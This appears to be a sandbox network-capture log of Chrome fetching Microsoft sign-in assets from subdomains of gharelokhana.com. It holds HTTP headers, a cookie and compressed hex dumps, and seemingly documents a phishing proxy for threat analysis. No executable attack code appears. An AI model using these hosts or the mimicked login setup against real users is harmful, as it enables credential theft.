                                                2024-12-05 07:24:22 UTC5552INData Raw: 63 c1 43 ba 73 01 b9 a8 df e4 60 35 6d a7 a7 63 13 0e b1 6f 89 9f 2f 60 f0 50 d3 f5 8d e8 62 3d 00 9e 9e 47 34 b0 84 62 d5 31 05 ee 35 de 31 30 21 f7 35 73 28 f0 a7 d4 37 96 95 a1 fd 8a 90 d4 26 ca 09 ee 7c b1 a0 75 c0 78 25 fc 5b b8 4a 97 62 5d e5 e9 c8 d6 06 90 79 1e 9e cf 72 bc 3b 19 85 ca e5 58 2d 4e e2 26 ad 05 ba e9 97 31 10 5a 1f e3 43 00 9a 14 2f 5d 20 ff 29 7c 11 59 5c 2a 10 20 a4 08 bf 6d 59 ed 1c f0 69 6d 12 5c 84 b5 a0 b6 b4 dc b6 53 3b 87 c3 28 19 a1 c4 d4 36 40 32 2a 05 02 5d 0a ce 23 4d fb 6a 4c 4e 09 c7 88 82 aa 5b 16 33 49 88 10 1e 67 77 51 17 5a ba ad 79 2d dd f8 f8 69 69 63 51 d4 f1 42 0a 3b e6 76 c9 c1 26 16 b8 bd 25 57 99 f8 d8 e7 9d 82 94 1b aa 27 59 07 12 65 89 8c eb bf d8 7d ef 7d 74 7b e8 c4 39 3c ed de 76 b6 6f 37 ba 0e 3c 0a 57
                                                Data Ascii: cCs`5mco/`Pb=G4b1510!5s(7&|ux%[Jb]yr;X-N&1ZC/] )|Y\* mYim\S;(6@2*]#MjLN[3IgwQZy-iicQB;v&%W'Ye}}t{9<vo7<W


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.549887164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:20 UTC853OUTGET /Prefetch/Prefetch.aspx HTTP/1.1
                                                Host: c65af2e9-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: iframe
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:21 UTC489INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: no-store, no-cache
                                                x-ms-correlation-id: a3219723-066d-4229-8cd4-cbb387f7f5e1
                                                x-ua-compatible: IE=Edge
                                                x-cache: CONFIG_NOCACHE
                                                x-msedge-ref: Ref A: 9F26860A257F4B65A1943D025436D21D Ref B: AMS231032602037 Ref C: 2024-12-05T07:24:21Z
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:21 UTC1252INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                2024-12-05 07:24:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.549893164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:21 UTC808OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=705de295-27a1-4bd9-946b-6b8b666c8137; brcap=0
                                                Sec-WebSocket-Key: iX3aSFpSrljZs2BWTlCVsw==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:22 UTC743INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:22 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: f91f7d07-a8b6-4ea0-9d5c-ed015223d000
                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.549901164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:23 UTC762OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:24 UTC805INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:24 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 5538
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                etag: 0x8DCBD531731891C
                                                x-ms-request-id: 2dfc057d-801e-0059-2f8c-467b78000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072424Z-15d6f6465c8rtd2nhC1DUSd87g00000000vg00000000prf9
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:24 UTC5538INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.549900164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:23 UTC810OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:24 UTC761INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:24 GMT
                                                Content-Type: image/gif
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                etag: 0x8DB5C3F48EC4154
                                                x-ms-request-id: 6132c721-501e-0004-551a-434e51000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072424Z-15b54885d96wlntrhC1FRA9y7800000007gg0000000002n0
                                                x-fd-int-roxy-purgeid: 4554691
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                2024-12-05 07:24:24 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                2024-12-05 07:24:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.549899164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:23 UTC569OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:25 UTC807INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:24 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 116432
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                etag: 0x8DCBD5317046A2F
                                                x-ms-request-id: fe4eb8a5-101e-005b-2e8c-46c5c0000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072424Z-15d6f6465c8r48kshC1DUStyaw00000001d0000000008yvt
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:25 UTC15577INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                2024-12-05 07:24:25 UTC14460INData Raw: 50 3c a7 8d 35 29 b4 b4 37 ed 87 fd a7 5e 67 d2 69 a4 09 2b 0b 6a 76 db 85 c2 38 1e 0c d5 2e 47 54 b9 4f 81 98 cd 68 0f 45 0e 89 61 23 e5 23 69 30 8d 8e d0 e7 28 0b 5c 68 53 96 4b 19 33 d1 cb e6 94 f4 01 f5 02 a7 61 8a c3 e7 92 5b 83 44 b1 41 e9 34 a0 12 4a 9c 4b 97 3c 2f b2 83 99 df 6e 64 f7 22 2b a9 6a 7c bf 83 44 ae ba ce 77 4a ec 76 58 ba 09 7f 3c fc 13 c1 9f 12 7b 99 49 16 6c 72 5a 14 01 b1 5b 98 91 ee d3 71 90 d8 dd d7 47 26 ff 29 b6 16 b4 53 69 dc 63 77 43 38 20 f9 6e d4 f3 f7 53 0a 91 4e 49 08 12 e6 5b 50 0b da 60 6f 60 75 63 38 0e fe c6 58 f4 54 3c 81 89 18 bb be c5 e0 71 d3 d6 4c a5 6b e3 9f 62 da f2 1b 68 a4 88 c5 fc 0d 17 bf 65 d8 5c 6e 03 1d 35 bd 83 54 38 45 6e 78 24 2c e9 f9 e8 fc e4 6f 6c e4 ca dd 29 aa 64 27 f0 74 b2 ef f5 26 5a ef 9a 48
                                                Data Ascii: P<5)7^gi+jv8.GTOhEa##i0(\hSK3a[DA4JK</nd"+j|DwJvX<{IlrZ[qG&)SicwC8 nSNI[P`o`uc8XT<qLkbhe\n5T8Enx$,ol)d't&ZH
                                                2024-12-05 07:24:25 UTC16384INData Raw: d9 f1 19 91 55 0a 6a 24 f1 b5 67 4f d6 d1 13 23 cb 7e 83 a3 24 ff 40 01 d0 9b ed 6f a5 1a d4 13 92 23 0c 34 26 de b6 98 b4 84 d8 54 b5 d0 77 87 61 8a 82 62 01 3e 9e 5a 10 0d 05 9b 6d 7b 5d 18 77 93 33 d6 25 e7 eb a2 3d b3 cc 65 c9 e9 1e db c1 a4 11 a5 57 5d 87 1c d6 81 ed ec 91 90 82 de 45 3d b8 99 7c 24 e5 30 77 71 8c 74 28 11 76 11 3d e1 45 a0 6c 0b 69 9d 73 bd ce c6 72 46 8f 8f bc a7 c7 c7 16 4f c7 d0 e6 52 11 b4 f8 4b f0 0a c6 1f 59 a3 6d 2e 3b 49 ad 84 f8 d1 b9 44 ac e4 84 97 8e 5e 78 33 c5 90 ed 83 2f eb 60 e1 7c 99 a7 7e 74 d8 b2 c2 85 35 22 12 46 19 5f 62 32 0c 25 03 cf dc 83 56 e7 8b 51 d8 57 26 3f 83 d8 05 6c d8 c2 ec 68 b0 89 e2 61 df 14 a3 c6 cf 14 a3 e6 b5 e7 6d 51 be 88 32 0f 9e 79 2a 31 cb 33 1e 99 27 46 4e 2b 47 49 02 d7 34 e6 32 0e 60 2e
                                                Data Ascii: Uj$gO#~$@o#4&Twab>Zm{]w3%=eW]E=|$0wqt(v=ElisrFORKYm.;ID^x3/`|~t5"F_b2%VQW&?lhamQ2y*13'FN+GI42`.
                                                2024-12-05 07:24:25 UTC16384INData Raw: de db f6 96 48 0b 96 0c 9f 39 97 f7 45 f4 3d e1 06 07 1d da 0b 14 a0 56 a6 e0 18 9f 3a 72 3a 16 f0 18 15 d0 a7 96 4c f1 8d bc 64 4d dd c9 ea cb 2f 79 84 ed 03 a9 80 14 74 ed 3e de 87 25 ed cc 1e bf 3c 0f a4 48 fe 60 5b 64 c5 dd c7 33 33 0d 50 28 85 f2 18 e0 94 47 27 53 b8 e9 01 11 27 4d 63 b4 70 9d 26 cd 57 61 11 fe 18 47 b7 70 a5 26 4d b5 78 70 a1 aa 3b e0 26 98 18 6b 76 15 cc 8c a7 6b 58 8f 1b 01 06 ec 12 28 ae 1b e6 64 51 1e ff 1d 65 13 72 4d d9 2d 7f 71 1d de bd 5c 58 70 a0 50 52 f7 0a 0d a6 df 24 05 8c fb 82 1e 73 f1 68 6c a2 0b 97 c8 10 e5 69 75 02 58 86 11 22 0b 5c ab c8 e2 5a 52 1f 6f 0a 98 c2 fa 25 5c 41 97 c2 6e b2 b4 f7 70 64 ef 61 9c a3 3c 1f 53 36 8c b8 bf c4 98 ac 0d 30 a9 f8 43 91 85 49 0e 95 fc 7e 31 c0 a0 82 68 b1 8b be 59 8f 8f 37 66 e2
                                                Data Ascii: H9E=V:r:LdM/yt>%<H`[d33P(G'S'Mcp&WaGp&Mxp;&kvkX(dQerM-q\XpPR$shliuX"\ZRo%\Anpda<S60CI~1hY7f
                                                2024-12-05 07:24:25 UTC16384INData Raw: be a8 a7 ca bb a3 0f 01 42 0f ba 1d 3a 06 ef 82 b3 6a 14 bb e4 65 cd 17 e2 26 4c 28 91 3b 55 d9 1c a1 b6 dc c5 2b d6 c2 73 72 58 02 d6 ea a6 0a ea 5c 9f 7b b4 4b 31 87 45 fc d9 95 55 6a b2 2e 2c 53 ff 05 81 b5 5d 54 20 09 80 79 f9 2c b5 dd 7d 45 8f 16 96 38 86 ea 67 81 ee aa 52 cb 50 55 86 7a 61 fe ed f4 f5 2b 43 81 82 b1 7a 36 9d 36 c5 de 9b c7 6e 86 61 c8 73 0f 4e 9d d9 a3 c4 b3 f1 43 e1 0e ca 01 ea d5 4e 22 4a c0 85 8c 9b 22 62 10 c3 92 27 5b 58 b9 a9 67 ec 32 35 bb 2c ec ca 74 20 7f e3 66 2d c1 82 79 09 54 21 b3 58 2d a3 4c 28 b4 4a f1 a0 a0 9a ed c4 9f da 04 78 89 ba 7f f4 2c 13 8e f1 af 7c 23 e5 6e df e4 01 b5 bd 4d 39 75 04 fb a2 e3 82 20 5c 84 b8 c2 74 be 10 51 6e 10 cb 97 6f 4c bb 6e ec b0 f9 7d 11 ff 40 65 ba 35 39 2b e0 a7 32 2a 73 b3 df 82 b3
                                                Data Ascii: B:je&L(;U+srX\{K1EUj.,S]T y,}E8gRPUza+Cz66nasNCN"J"b'[Xg25,t f-yT!X-L(Jx,|#nM9u \tQnoLn}@e59+2*s
                                                2024-12-05 07:24:25 UTC2731INData Raw: 4b 0a 40 e2 ed 57 df 9a e2 2f d0 09 3d bb df cc f5 58 30 b2 26 f0 bb 60 0f 1c 96 9b bf c3 27 df eb 80 29 61 48 a9 19 7c ab f3 49 83 f6 43 00 53 18 42 7c f2 00 30 84 a9 66 a1 39 a0 f3 f8 42 a8 23 25 47 7f 38 7b e0 99 33 99 a6 cd 17 f1 59 05 07 ac 7c 80 13 12 19 1f 10 fd b6 e0 43 3c ca 55 33 8d 05 63 a5 8b ba 31 26 18 df 19 50 ff 84 22 7d c0 72 a5 2d 9c 9a 51 98 2e 71 ec 00 aa e3 6a 5d 7c 75 65 ad 57 62 75 60 42 07 e1 9a bd 5d 10 51 a0 34 82 5e d6 41 73 8c ef 7f d2 81 a2 43 e8 8d c9 b1 2f b0 27 69 9a d6 a3 9d 91 f9 a2 ac 0d c8 ed 70 da 79 5f d0 ce 40 48 a2 a3 8c dd 83 91 68 48 46 53 bc 70 c5 fe 6f 05 b5 c6 a9 5b b9 f4 18 65 a9 0a 08 31 dd d3 6d 5e 4e 0e 0d ae 6a ab 60 00 42 75 e8 b1 88 2a 0f b5 6c 0c 90 c1 5f 48 a2 ca 63 38 21 75 59 22 a0 53 36 66 14 90 d5
                                                Data Ascii: K@W/=X0&`')aH|ICSB|0f9B#%G8{3Y|C<U3c1&P"}r-Q.qj]|ueWbu`B]Q4^AsC/'ipy_@HhHFSpo[e1m^Nj`Bu*l_Hc8!uY"S6f
                                                2024-12-05 07:24:25 UTC16384INData Raw: 71 6e b4 96 37 37 90 b0 3f 74 3f d3 58 29 8f e4 5f 31 d8 4b 6c 58 19 31 dd 6f 84 bc fe 6a 6c d6 48 c9 44 e9 10 f3 51 3c 14 d8 b8 55 3b 15 56 ed ae 31 0d c2 56 26 32 12 bb 99 48 b6 a3 1b 7c fc 74 93 61 bd 2c 70 93 0c 02 23 70 8e 72 8d f4 11 55 d9 66 80 d2 92 2f 41 d7 b1 d0 f7 b0 b2 24 f4 a5 23 3d 25 f4 25 11 6f 5a e8 db a0 80 a0 23 5d 23 63 1d 0d 05 bf 63 d5 56 f6 8e 9f 04 6c 68 be b3 c2 11 9c 71 f7 eb 80 51 1f a6 88 1a 5c 32 47 16 0a 2b 36 86 5e f4 04 ae e8 03 d7 33 42 e3 23 a0 98 58 1f cd 8e 22 3d 6d 18 db 6f da f0 80 db e8 8d 70 66 7d 73 94 36 c7 75 80 04 a7 72 d3 bc 9b cf 3d dd 4f 9b e3 06 f4 58 9a e3 fa a6 df 99 71 73 5c 5f b1 0c 63 e2 6d df 4c d9 8b c5 6a ab 11 9b b0 1b 8e b9 28 e7 99 9e aa d8 be 6b fa 86 3e d4 6f 8a 13 e4 e0 28 01 cc e4 e8 a6 35 29
                                                Data Ascii: qn77?t?X)_1KlX1ojlHDQ<U;V1V&2H|ta,p#prUf/A$#=%%oZ#]#ccVlhqQ\2G+6^3B#X"=mopf}s6ur=OXqs\_cmLj(k>o(5)
                                                2024-12-05 07:24:25 UTC16384INData Raw: 4d 73 44 18 ce 06 f2 6f fc 2c 3e 5c 12 09 28 41 34 50 22 10 b3 c9 70 f8 8e f3 f9 b1 72 84 4e 4d cc 32 4e ce cf 7d d3 49 cd 26 1a 53 3e 32 9b 70 f0 66 f1 e6 c8 92 13 0d 70 3a b6 26 f2 15 60 cd 13 38 98 62 90 60 3e a5 cd 0a 2b 37 f7 16 0c 46 b3 87 2c b9 30 e2 1d 9a 77 98 59 f1 fd c9 c7 f3 df ce ae 4f 2e 2f 4f fe bc 7e f9 e9 f5 eb b3 cb eb df ce cf 7e bf 42 df b7 ec 2f 8f 95 2f f1 2c 21 15 f4 02 c6 0b ad aa e1 77 ca f4 1d 34 1c ae 26 5f 6c cd d0 ce 7d 19 a0 fb 8a c8 03 a3 ea ac 8f 57 2b 71 7a 45 cc a1 96 b2 35 12 e2 10 69 f4 41 79 17 05 7c a1 4d ac 8f ab 48 86 a2 4e c1 3e 76 15 6d c4 40 d7 7e f7 3d 77 b8 c3 6b 6b dc 68 a9 d5 3b 72 00 0e 09 d2 0a bd ae e9 77 7a 00 84 28 a1 05 aa 60 3d 73 c8 14 5a a8 c7 49 29 a4 0d 7a 83 bc f9 37 41 11 24 5e 5a 91 03 ca 8d 85
                                                Data Ascii: MsDo,>\(A4P"prNM2N}I&S>2pfp:&`8b`>+7F,0wYO./O~~B//,!w4&_l}W+qzE5iAy|MHN>vm@~=wkkh;rwz(`=sZI)z7A$^Z
